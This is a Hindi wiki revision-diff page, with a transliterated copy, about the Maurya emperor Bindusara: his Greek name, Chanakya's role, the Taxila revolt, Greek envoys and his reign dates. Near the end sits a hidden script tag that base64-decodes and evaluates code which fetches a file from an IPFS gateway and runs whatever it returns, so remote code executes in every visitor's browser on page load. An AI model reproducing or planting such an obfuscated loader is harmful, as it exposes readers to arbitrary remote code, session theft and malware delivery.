Difference between revisions of "बिन्दुसार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m
Line 5: Line 5:
 
*इनका पुत्र [[अशोक|अशोक महान]] था।
 
*इनका पुत्र [[अशोक|अशोक महान]] था।
  
चंद्रगुप्त की मृत्यु के पश्चात् उसका पुत्र बिन्दुसार सम्राट बना। यूनानी लेखों के अनुसार उसका नाम [[अमित्रकेटे]] था। विद्वानों के अनुसार अमित्रकेटे का संस्कृत रूप है अमित्रघात या अमित्रखाद (शत्रुओं का नाश करने वाला)। सम्भवतः यह बिन्दुसार का विरुद रहा होगा। तिब्बती [[लामा तारनाथ]] तथा जैन अनुश्रुति के अनुसार चाणक्य बिन्दुसार का भी मंत्री रहा। चाणक्य ने 16 राज्य के राजाओं और सामंतों का नाश किया और बिन्दुसार को पूर्वी समुद्र से पश्चिमी समुद्र पर्यन्त भू-भाग का अधीश बनाया। हो सकता है कि चंद्रगुप्त की मृत्यु के पश्चात कुछ राज्यों ने मौर्य सत्ता के विरुद्ध विद्रोह किया हो। चाणक्य ने सफलतापूर्वक उनका दमन किया। [[दिव्यावदान]] में उत्तरापथ की राजधानी [[तक्षशिला]] में ऐसे ही विद्रोह का उल्लेख है। इस विद्रोह को शान्त करने के लिए बिन्दुसार ने अपने पुत्र [[अशोक]] को भेजा था। इसके पश्चात अशोक स्वस देश गया। 'स्वस' सम्भवतः [[नेपाल]] के आस-पास के प्रदेश के खस रहे होंगे। तारनाथ के अनुसार खस्या और नेपाल के लोगों ने विद्रोह किया और अशोक ने इन प्रदेशों को जीता।  
+
चंद्रगुप्त की मृत्यु के पश्चात् उसका पुत्र बिन्दुसार सम्राट बना। यूनानी लेखों के अनुसार उसका नाम [[अमित्रकेटे]] था। विद्वानों के अनुसार अमित्रकेटे का संस्कृत रूप है अमित्रघात या अमित्रखाद (शत्रुओं का नाश करने वाला)। सम्भवतः यह बिन्दुसार का विरुद रहा होगा। तिब्बती [[लामा तारनाथ]] तथा जैन अनुश्रुति के अनुसार चाणक्य बिन्दुसार का भी मंत्री रहा। चाणक्य ने 16 राज्य के राजाओं और सामंतों का नाश किया और बिन्दुसार को पूर्वी समुद्र से पश्चिमी समुद्र पर्यन्त भू-भाग का अधीश बनाया। हो सकता है कि चंद्रगुप्त की मृत्यु के पश्चात कुछ राज्यों ने मौर्य सत्ता के विरुद्ध विद्रोह किया हो। चाणक्य ने सफलतापूर्वक उनका दमन किया। [[दिव्यावदान]] में [[उत्तरापथ]] की राजधानी [[तक्षशिला]] में ऐसे ही विद्रोह का उल्लेख है। इस विद्रोह को शान्त करने के लिए बिन्दुसार ने अपने पुत्र [[अशोक]] को भेजा था। इसके पश्चात अशोक स्वस देश गया। 'स्वस' सम्भवतः [[नेपाल]] के आस-पास के प्रदेश के खस रहे होंगे। तारनाथ के अनुसार खस्या और नेपाल के लोगों ने विद्रोह किया और अशोक ने इन प्रदेशों को जीता।  
  
 
विदेशों के साथ अशोक ने शान्ति और मैत्रीपूर्ण सम्बन्ध बनाए रखा। सेल्यूकस वंश के राजाओं तथा अन्य यूनानी शासकों के साथ चंद्रगुप्त के समय के सम्बन्ध बने रहे। स्टैवो के अनुसार सेल्यूकस के उत्तराधिकारी [[एण्टियोकस]] प्रथम ने अपना राजदूत [[डायमेकस]] बिन्दुसार के दरबार में भेजा। प्लिनी के अनुसार टोलमी द्वितीय फिलेडेल्फस ने डायोनियस को बिन्दुसार के दरबार में नियुक्त किया।  
 
विदेशों के साथ अशोक ने शान्ति और मैत्रीपूर्ण सम्बन्ध बनाए रखा। सेल्यूकस वंश के राजाओं तथा अन्य यूनानी शासकों के साथ चंद्रगुप्त के समय के सम्बन्ध बने रहे। स्टैवो के अनुसार सेल्यूकस के उत्तराधिकारी [[एण्टियोकस]] प्रथम ने अपना राजदूत [[डायमेकस]] बिन्दुसार के दरबार में भेजा। प्लिनी के अनुसार टोलमी द्वितीय फिलेडेल्फस ने डायोनियस को बिन्दुसार के दरबार में नियुक्त किया।  

Revision as of 13:37, 29 June 2011

  • ye maury samrat the jinhoanne 297 ee.poo. ke asapas gaddi par baithakar shasan kiya tha.
  • yoonani sootroan mean unaka ullekh ‘amitrochets’ nam se hua hai, jo sanbhavat: sanskrit shabd 'amitraghat' se liya gaya hai, jisaka arth hai, 'shatrunashak'.
  • yah upadhi dakshin mean unake saphal sainik abhiyanoan ke liye di gee hogi, kyoanki uttar bharat par to unake pita chandragupt maury ne pahale hi vijay prapt kar li thi.
  • biandusar ka vijay abhiyan karnatak ke asapas jakar rooka aur vah bhi sanbhavat: isaliye ki dakshin ke chol, paandy v cher saradaroan aur rajaoan ke mauryo se achchhe sanbandh the.
  • inaka putr ashok mahan tha.

chandragupt ki mrityu ke pashchath usaka putr bindusar samrat bana. yoonani lekhoan ke anusar usaka nam amitrakete tha. vidvanoan ke anusar amitrakete ka sanskrit roop hai amitraghat ya amitrakhad (shatruoan ka nash karane vala). sambhavatah yah bindusar ka virud raha hoga. tibbati lama taranath tatha jain anushruti ke anusar chanaky bindusar ka bhi mantri raha. chanaky ne 16 rajy ke rajaoan aur samantoan ka nash kiya aur bindusar ko poorvi samudr se pashchimi samudr paryant bhoo-bhag ka adhish banaya. ho sakata hai ki chandragupt ki mrityu ke pashchat kuchh rajyoan ne maury satta ke viruddh vidroh kiya ho. chanaky ne saphalatapoorvak unaka daman kiya. divyavadan mean uttarapath ki rajadhani takshashila mean aise hi vidroh ka ullekh hai. is vidroh ko shant karane ke lie bindusar ne apane putr ashok ko bheja tha. isake pashchat ashok svas desh gaya. 'svas' sambhavatah nepal ke as-pas ke pradesh ke khas rahe hoange. taranath ke anusar khasya aur nepal ke logoan ne vidroh kiya aur ashok ne in pradeshoan ko jita.

videshoan ke sath ashok ne shanti aur maitripoorn sambandh banae rakha. selyookas vansh ke rajaoan tatha any yoonani shasakoan ke sath chandragupt ke samay ke sambandh bane rahe. staivo ke anusar selyookas ke uttaradhikari entiyokas pratham ne apana rajadoot dayamekas bindusar ke darabar mean bheja. plini ke anusar tolami dvitiy philedelphas ne dayoniyas ko bindusar ke darabar mean niyukt kiya.

apane pita ki bhaanti bindusar bhi jijnasu tha aur vidvanoan tatha darshanikoan ka adar karata tha. aitheniyas ke anusar bindusar ne entiyokas (siriya ka shasak) ko ek yoonani darshanik bhejane ke lie likha tha. divyavadan ki ek katha ke anusar ajivak parivrajak bindusar ki sabha ko sushobhit karate the.

puranoan ke anusar bindusar ne 24 varsh tak, kintu mahavansh ke anusar 27 varsh tak rajy kiya. d aau. radha kumud mukarji ne bindusar ki mrityu tithi eesa poorv 272 nirdharit ki hai. kuchh any vidvan yah manate haian ki bindusar ki mrityu eesa poorv 270 mean huee.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh